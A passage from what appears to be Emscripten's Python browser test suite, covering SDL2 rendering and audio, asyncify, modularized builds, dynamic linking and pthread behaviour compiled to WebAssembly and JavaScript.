self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-s', 'USE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-s', 'GL_TESTING=1'], manual_reference=True, post_build=post)
def test_sdl2_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_test_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
def test_sdl2_timer(self):
self.btest('sdl2_timer.c', expected='5', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_size(self):
self.btest('sdl2_canvas_size.c', expected='1', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_read(self):
# SDL, OpenGL, readPixels
create_test_file('sdl2_gl_read.c', self.with_report_result(open(path_from_root('tests', 'sdl2_gl_read.c')).read()))
self.compile_btest(['sdl2_gl_read.c', '-o', 'something.html', '-s', 'USE_SDL=2'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_unwasteful(self):
self.btest('sdl2_unwasteful.cpp', expected='1', args=['-s', 'USE_SDL=2', '-O1'])
def test_sdl2_canvas_write(self):
self.btest('sdl2_canvas_write.cpp', expected='0', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_frames_swap(self):
def post_build(*args):
self.post_manual_reftest(*args)
html = open('test.html').read()
html2 = html.replace('''Module['postRun'] = doReftest;''', '') # we don't want the very first frame
assert html != html2
create_test_file('test.html', html2)
self.btest('sdl2_gl_frames_swap.c', reference='sdl2_gl_frames_swap.png', args=['--proxy-to-worker', '-s', 'GL_TESTING=1', '-s', 'USE_SDL=2'], manual_reference=True, post_build=post_build)
@requires_graphics_hardware
def test_sdl2_ttf(self):
shutil.copy2(path_from_root('tests', 'freetype', 'LiberationSansBold.ttf'), self.get_dir())
self.btest('sdl2_ttf.c', reference='sdl2_ttf.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'LiberationSansBold.ttf'],
message='You should see colorful "hello" and "world" in the window')
def test_sdl2_custom_cursor(self):
shutil.copyfile(path_from_root('tests', 'cursor.bmp'), 'cursor.bmp')
self.btest('sdl2_custom_cursor.c', expected='1', args=['--preload-file', 'cursor.bmp', '-s', 'USE_SDL=2'])
def test_sdl2_misc(self):
self.btest('sdl2_misc.c', expected='1', args=['-s', 'USE_SDL=2'])
print('also test building to object files first')
src = open(path_from_root('tests', 'sdl2_misc.c')).read()
create_test_file('test.c', self.with_report_result(src))
run_process([PYTHON, EMCC, 'test.c', '-s', 'USE_SDL=2', '-o', 'test.o'])
self.compile_btest(['test.o', '-s', 'USE_SDL=2', '-o', 'test.html'])
self.run_browser('test.html', '...', '/report_result?1')
@requires_sound_hardware
def test_sdl2_mixer(self):
shutil.copyfile(path_from_root('tests', 'sounds', 'alarmvictory_1.ogg'), 'sound.ogg')
self.btest('sdl2_mixer.c', expected='1', args=['--preload-file', 'sound.ogg', '-s', 'USE_SDL=2', '-s', 'USE_SDL_MIXER=2', '-s', 'TOTAL_MEMORY=33554432'])
@requires_sound_hardware
def test_sdl2_mixer_wav(self):
shutil.copyfile(path_from_root('tests', 'sounds', 'the_entertainer.wav'), 'sound.wav')
self.btest('sdl2_mixer_wav.c', expected='1', args=['--preload-file', 'sound.wav', '-s', 'USE_SDL=2', '-s', 'USE_SDL_MIXER=2', '-s', 'TOTAL_MEMORY=33554432'])
@no_wasm_backend('cocos2d needs to be ported')
@requires_graphics_hardware
def test_cocos2d_hello(self):
cocos2d_root = os.path.join(system_libs.Ports.get_build_dir(), 'cocos2d')
preload_file = os.path.join(cocos2d_root, 'samples', 'HelloCpp', 'Resources') + '@'
self.btest('cocos2d_hello.cpp', reference='cocos2d_hello.png', reference_slack=1,
args=['-s', 'USE_COCOS2D=3', '-s', 'ERROR_ON_UNDEFINED_SYMBOLS=0', '--std=c++11', '--preload-file', preload_file, '--use-preload-plugins'],
message='You should see Cocos2d logo')
def test_async(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('browser/async.cpp', '1', args=['-O' + str(opts), '-g2'] + self.get_async_args())
@no_fastcomp('emterpretify is not compatible with threads')
@requires_threads
def test_async_in_pthread(self):
self.btest('browser/async.cpp', '1', args=self.get_async_args() + ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-g'])
def test_async_2(self):
# Error.stackTraceLimit default to 10 in chrome but this test relies on more
# than 40 stack frames being reported.
create_test_file('pre.js', 'Error.stackTraceLimit = 80;\n')
self.btest('browser/async_2.cpp', '40', args=['-O3', '--pre-js', 'pre.js'] + self.get_async_args())
def test_async_virtual(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_virtual.cpp', '5', args=['-O' + str(opts), '-profiling'] + self.get_async_args())
def test_async_virtual_2(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_virtual_2.cpp', '1', args=['-O' + str(opts), '-s', 'ASSERTIONS=1', '-s', 'SAFE_HEAP=1', '-profiling'] + self.get_async_args())
# Test async sleeps in the presence of invoke_* calls, which can happen with
# longjmp or exceptions.
@parameterized({
'O0': ([],), # noqa
'O3': (['-O3'],), # noqa
})
def test_async_longjmp(self, args):
self.btest('browser/async_longjmp.cpp', '2', args=args + self.get_async_args())
@no_wasm_backend('emterpretify, with emterpreter-specific error logging')
def test_emterpreter_async_bad(self):
for opts in [0, 3]:
print(opts)
self.btest('emterpreter_async_bad.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_middle"]', '-s', 'ASSERTIONS=1'])
@no_wasm_backend('emterpretify, with emterpreter-specific error logging')
def test_emterpreter_async_bad_2(self):
for opts in [0, 3]:
for assertions in [0, 1]:
# without assertions, we end up continuing to run more non-emterpreted code in this testcase, returning 1
# with assertions, we hit the emterpreter-async assertion on that, and report a clear error
expected = '2' if assertions else '1'
print(opts, assertions, expected)
self.btest('emterpreter_async_bad_2.cpp', expected, args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_middle"]', '-s', 'ASSERTIONS=%s' % assertions, '-g'])
def test_async_mainloop(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_mainloop.cpp', '121', args=['-O' + str(opts)] + self.get_async_args())
@no_wasm_backend('emterpretify - specific behavior wrt other async calls being paused or not')
def test_emterpreter_async_with_manual(self):
for opts in [0, 3]:
print(opts)
self.btest('emterpreter_async_with_manual.cpp', '121', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_acall"]'])
@no_wasm_backend('emterpretify - yielding behavior')
def test_emterpreter_async_sleep2(self):
self.btest('emterpreter_async_sleep2.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Oz'])
@no_wasm_backend('emterpretify - safe-heap specific issues')
def test_emterpreter_async_sleep2_safeheap(self):
# check that safe-heap machinery does not cause errors in async operations
self.btest('emterpreter_async_sleep2_safeheap.cpp', '17', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Oz', '-profiling', '-s', 'SAFE_HEAP=1', '-s', 'ASSERTIONS=1', '-s', 'EMTERPRETIFY_WHITELIST=["_main","_callback","_fix"]', '-s', 'EXIT_RUNTIME=1'])
@no_wasm_backend('emterpretify - yield-specific')
@requires_sound_hardware
def test_sdl_audio_beep_sleep(self):
self.btest('sdl_audio_beep_sleep.cpp', '1', args=['-Os', '-s', 'ASSERTIONS=1', '-s', 'DISABLE_EXCEPTION_CATCHING=0', '-profiling', '-s', 'SAFE_HEAP=1', '-lSDL'] + self.get_async_args(), timeout=90)
def test_mainloop_reschedule(self):
self.btest('mainloop_reschedule.cpp', '1', args=['-Os'] + self.get_async_args())
def test_mainloop_infloop(self):
self.btest('mainloop_infloop.cpp', '1', args=self.get_async_args())
def test_async_iostream(self):
self.btest('browser/async_iostream.cpp', '1', args=self.get_async_args())
# Test an async return value. The value goes through a custom JS library
# method that uses asyncify, and therefore it needs to be declared in
# ASYNCIFY_IMPORTS.
# To make the test more precise we also use ASYNCIFY_IGNORE_INDIRECT here.
@parameterized({
'normal': (['-s', 'ASYNCIFY_IMPORTS=["sync_tunnel"]'],), # noqa
'nothing': (['-DBAD'],), # noqa
'empty_list': (['-DBAD', '-s', 'ASYNCIFY_IMPORTS=[]'],), # noqa
})
@no_fastcomp('emterpretify never worked here')
def test_async_returnvalue(self, args):
self.btest('browser/async_returnvalue.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_IGNORE_INDIRECT', '--js-library', path_from_root('tests', 'browser', 'async_returnvalue.js')] + args + ['-s', 'ASSERTIONS=1'])
@no_fastcomp('wasm backend asyncify specific')
def test_async_stack_overflow(self):
self.btest('browser/async_stack_overflow.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_STACK_SIZE=4'])
@requires_sync_compilation
def test_modularize(self):
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure', '1']]:
for args, code in [
([], 'Module();'), # defaults
# use EXPORT_NAME
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
if (typeof Module !== "undefined") throw "what?!"; // do not pollute the global scope, we are modularized!
HelloWorld.noInitialRun = true; // errorneous module capture will load this and cause timeout
HelloWorld();
'''),
# pass in a Module option (which prevents main(), which we then invoke ourselves)
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
var hello = HelloWorld({ noInitialRun: true, onRuntimeInitialized: function() {
setTimeout(function() { hello._main(); }); // must be async, because onRuntimeInitialized may be called synchronously, so |hello| is not yet set!
} });
'''),
# similar, but without a mem init file, everything is sync and simple
(['-s', 'EXPORT_NAME="HelloWorld"', '--memory-init-file', '0'], '''
var hello = HelloWorld({ noInitialRun: true});
hello._main();
'''),
# use the then() API
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
HelloWorld({ noInitialRun: true }).then(function(hello) {
hello._main();
});
'''),
# then() API, also note the returned value
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
var helloOutside = HelloWorld({ noInitialRun: true }).then(function(hello) {
setTimeout(function() {
hello._main();
if (hello !== helloOutside) throw 'helloOutside has not been set!'; // as we are async, helloOutside must have been set
});
});
'''),
]:
print('test on', opts, args, code)
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
create_test_file('test.c', self.with_report_result(src))
# this test is synchronous, so avoid async startup due to wasm features
self.compile_btest(['test.c', '-s', 'MODULARIZE=1', '-s', 'WASM_ASYNC_COMPILATION=0', '-s', 'SINGLE_FILE=1'] + args + opts)
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
%s
</script>
''' % code)
self.run_browser('a.html', '...', '/report_result?0')
# test illustrating the regression on the modularize feature since commit c5af8f6
# when compiling with the --preload-file option
@no_wasm_backend('cannot customize TOTAL_MEMORY in wasm at runtime')
def test_modularize_and_preload_files(self):
# amount of memory different from the default one that will be allocated for the emscripten heap
totalMemory = 33554432
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure', '1']]:
# the main function simply checks that the amount of allocated heap memory is correct
src = r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
EM_ASM({
// use eval here in order for the test with closure compiler enabled to succeed
var totalMemory = Module['TOTAL_MEMORY'];
assert(totalMemory === %d, 'bad memory size');
});
REPORT_RESULT(0);
return 0;
}
''' % totalMemory
create_test_file('test.c', self.with_report_result(src))
# generate a dummy file
create_test_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
# no wasm, since this tests customizing total memory at runtime
self.compile_btest(['test.c', '-s', 'WASM=0', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts)
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
// instantiate the Foo module with custom TOTAL_MEMORY value
var foo = Foo({ TOTAL_MEMORY: %d });
</script>
''' % totalMemory)
self.run_browser('a.html', '...', '/report_result?0')
def test_webidl(self):
# see original in test_core.py
run_process([PYTHON, path_from_root('tools', 'webidl_binder.py'),
path_from_root('tests', 'webidl', 'test.idl'),
'glue'])
self.assertExists('glue.cpp')
self.assertExists('glue.js')
for opts in [[], ['-O1'], ['-O2']]:
print(opts)
self.btest(os.path.join('webidl', 'test.cpp'), '1', args=['--post-js', 'glue.js', '-I.', '-DBROWSER'] + opts)
@requires_sync_compilation
def test_dynamic_link(self):
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <emscripten.h>
char *side(const char *data);
int main() {
char *temp = side("hello through side\n");
char *ret = (char*)malloc(strlen(temp)+1);
strcpy(ret, temp);
temp[1] = 'x';
EM_ASM({
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = x;
Module.realPrint(x);
};
});
puts(ret);
EM_ASM({ assert(Module.printed === 'hello through side', ['expected', Module.printed]); });
REPORT_RESULT(2);
return 0;
}
''')
create_test_file('side.cpp', r'''
#include <stdlib.h>
#include <string.h>
char *side(const char *data);
char *side(const char *data) {
char *ret = (char*)malloc(strlen(data)+1);
strcpy(ret, data);
return ret;
}
''')
run_process([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-s', 'EXPORT_ALL=1'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL=1'])
print('wasm in worker (we can read binary data synchronously there)')
create_test_file('pre.js', '''
var Module = { dynamicLibraries: ['side.wasm'] };
''')
run_process([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-s', 'WASM=1', '-s', 'EXPORT_ALL=1'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'WASM=1', '--proxy-to-worker', '-s', 'EXPORT_ALL=1'])
print('wasm (will auto-preload since no sync binary reading)')
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
# same wasm side module works
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'WASM=1', '-s', 'EXPORT_ALL=1'])
# verify that dynamic linking works in all kinds of in-browser environments.
# don't mix different kinds in a single test.
def test_dylink_dso_needed_wasm(self):
self._test_dylink_dso_needed(1, 0)
def test_dylink_dso_needed_wasm_inworker(self):
self._test_dylink_dso_needed(1, 1)
def test_dylink_dso_needed_asmjs(self):
self._test_dylink_dso_needed(0, 0)
def test_dylink_dso_needed_asmjs_inworker(self):
self._test_dylink_dso_needed(0, 1)
@no_wasm_backend('https://github.com/emscripten-core/emscripten/issues/8753')
@requires_sync_compilation
def _test_dylink_dso_needed(self, wasm, inworker):
# here we reuse runner._test_dylink_dso_needed, but the code is run via browser.
print('\n# wasm=%d inworker=%d' % (wasm, inworker))
self.set_setting('WASM', wasm)
self.emcc_args += ['-O2']
def do_run(src, expected_output):
# XXX there is no infrastructure (yet ?) to retrieve stdout from browser in tests.
# -> do the assert about expected output inside browser.
#
# we have to put the hook into post.js because in main it is too late
# (in main we won't be able to catch what static constructors inside
# linked dynlibs printed), and in pre.js it is too early (out is not yet
# setup by the shell).
create_test_file('post.js', r'''
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = "";
Module.printed += x + '\n'; // out is passed str without last \n
Module.realPrint(x);
};
''')
src += r'''
int main() {
_main();
EM_ASM({
var expected = %r;
assert(Module.printed === expected, ['stdout expected:', expected]);
});
REPORT_RESULT(0);
}
''' % (expected_output,)
# --proxy-to-worker only on main
if inworker:
self.emcc_args += ['--proxy-to-worker']
self.btest(src, '0', args=self.get_emcc_args() + ['--post-js', 'post.js'])
super(browser, self)._test_dylink_dso_needed(do_run)
@requires_graphics_hardware
@requires_sync_compilation
def test_dynamic_link_glemu(self):
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
const char *side();
int main() {
const char *exts = side();
puts(side());
assert(strstr(exts, "GL_EXT_texture_env_combine"));
REPORT_RESULT(1);
return 0;
}
''')
create_test_file('side.cpp', r'''
#include "SDL/SDL.h"
#include "SDL/SDL_opengl.h"
const char *side() {
SDL_Init(SDL_INIT_VIDEO);
SDL_SetVideoMode(600, 600, 16, SDL_OPENGL);
return (const char *)glGetString(GL_EXTENSIONS);
}
''')
run_process([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-lSDL', '-s', 'EXPORT_ALL=1'])
self.btest(self.in_dir('main.cpp'), '1', args=['-s', 'MAIN_MODULE=1', '-O2', '-s', 'LEGACY_GL_EMULATION=1', '-lSDL', '-lGL', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL=1'])
def test_memory_growth_during_startup(self):
create_test_file('data.dat', 'X' * (30 * 1024 * 1024))
self.btest('browser_test_hello_world.c', '0', args=['-s', 'ASSERTIONS=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'TOTAL_MEMORY=16MB', '-s', 'TOTAL_STACK=16384', '--preload-file', 'data.dat'])
# pthreads tests
def prep_no_SAB(self):
create_test_file('html.html', open(path_from_root('src', 'shell_minimal.html')).read().replace('''<body>''', '''<body>
<script>
SharedArrayBuffer = undefined;
Atomics = undefined;
</script>
'''))
# Test that the emscripten_ atomics api functions work.
@requires_threads
def test_pthread_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test 64-bit atomics.
@requires_threads
def test_pthread_64bit_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test 64-bit C++11 atomics.
@requires_threads
def test_pthread_64bit_cxx11_atomics(self):
for opt in [['-O0'], ['-O3']]:
for pthreads in [[], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_cxx11_atomics.cpp'), expected='0', args=opt + pthreads + ['-std=c++11'])
# Test the old GCC atomic __sync_fetch_and_op builtin operations.
@requires_threads
def test_pthread_gcc_atomic_fetch_and_op(self):
# We need to resort to using regexes to optimize out SharedArrayBuffer when pthreads are not supported, which is brittle!
# Therefore perform very extensive testing of different codegen modes to catch any problems.
for opt in [[], ['-O1'], ['-O2'], ['-O3'], ['-O3', '-s', 'AGGRESSIVE_VARIABLE_ELIMINATION=1'], ['-Os']]:
for debug in [[], ['-g1'], ['-g2'], ['-g4']]:
for f32 in [[], ['-s', 'PRECISE_F32=1', '--separate-asm', '-s', 'WASM=0']]:
args = opt + debug + f32
print(args)
if self.is_wasm_backend() and '--separate-asm' in args or 'AGGRESSIVE_VARIABLE_ELIMINATION=1' in args:
continue
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_fetch_and_op.cpp'), expected='0', args=args + ['-s', 'TOTAL_MEMORY=64MB', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# 64 bit version of the above test.
@requires_threads
def test_pthread_gcc_64bit_atomic_fetch_and_op(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_fetch_and_op.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Test the old GCC atomic __sync_op_and_fetch builtin operations.
@requires_threads
def test_pthread_gcc_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# 64 bit version of the above test.
@requires_threads
def test_pthread_gcc_64bit_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Tests the rest of the remaining GCC atomics after the two above tests.
@requires_threads
def test_pthread_gcc_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the __sync_lock_test_and_set and __sync_lock_release primitives.
@requires_threads
def test_pthread_gcc_spinlock(self):
for arg in [[], ['-DUSE_EMSCRIPTEN_INTRINSICS']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_spinlock.cpp'), expected='800', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, also_asmjs=True)
# Test that basic thread creation works.
@requires_threads
def test_pthread_create(self):
def test(args):
print(args)
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + args)
test([])
test(['-O3'])
test(['-s', 'MODULARIZE_INSTANCE=1'])
# Tests the -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_pthread_proxy_to_pthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxy_to_pthread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Test that a pthread can spawn another pthread of its own.
@requires_threads
def test_pthread_create_pthread(self):
for modularize in [[], ['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')]]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create_pthread.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'] + modularize)
# Test another case of pthreads spawning pthreads, but this time the callers immediately join on the threads they created.
@requires_threads
def test_pthread_nested_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_nested_spawns.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that main thread can wait for a pthread to finish via pthread_join().
@requires_threads
def test_pthread_join(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_join.cpp'), expected='6765', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that threads can rejoin the pool once detached and finished
@requires_threads
def test_std_thread_detach(self):
self.btest(path_from_root('tests', 'pthread', 'test_std_thread_detach.cpp'), expected='0', args=['-std=c++11', '-s', 'USE_PTHREADS=1'])
# Test pthread_cancel() operation
@requires_threads
def test_pthread_cancel(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cancel.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test pthread_kill() operation
@no_chrome('pthread_kill hangs chrome renderer, and keep subsequent tests from passing')
@requires_threads
def test_pthread_kill(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_kill.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthread cleanup stack (pthread_cleanup_push/_pop) works.
@requires_threads
def test_pthread_cleanup(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cleanup.cpp'), expected='907640832', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Tests the pthread mutex api.
@requires_threads
def test_pthread_mutex(self):
for arg in [[], ['-DSPINLOCK_TEST']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_mutex.cpp'), expected='50', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
@requires_threads
def test_pthread_attr_getstack(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_attr_getstack.cpp'), expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that memory allocation is thread-safe.
@requires_threads
def test_pthread_malloc(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Stress test pthreads allocating memory that will call to sbrk(), and main thread has to free up the data.
@requires_threads
def test_pthread_malloc_free(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc_free.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'TOTAL_MEMORY=256MB'])
# Test that the pthread_barrier API works ok.
@requires_threads
def test_pthread_barrier(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_barrier.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the pthread_once() function.
@requires_threads
def test_pthread_once(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_once.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test against a certain thread exit time handling bug by spawning tons of threads.
@requires_threads
def test_pthread_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_spawns.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# It is common for code to flip volatile global vars for thread control. This is a bit lax, but nevertheless, test whether that
# kind of scheme will work with Emscripten as well.
@requires_threads
def test_pthread_volatile(self):
for arg in [[], ['-DUSE_C_VOLATILE']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_volatile.cpp'), expected='1', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
# Test thread-specific data (TLS).
@requires_threads
def test_pthread_thread_local_storage(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_thread_local_storage.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
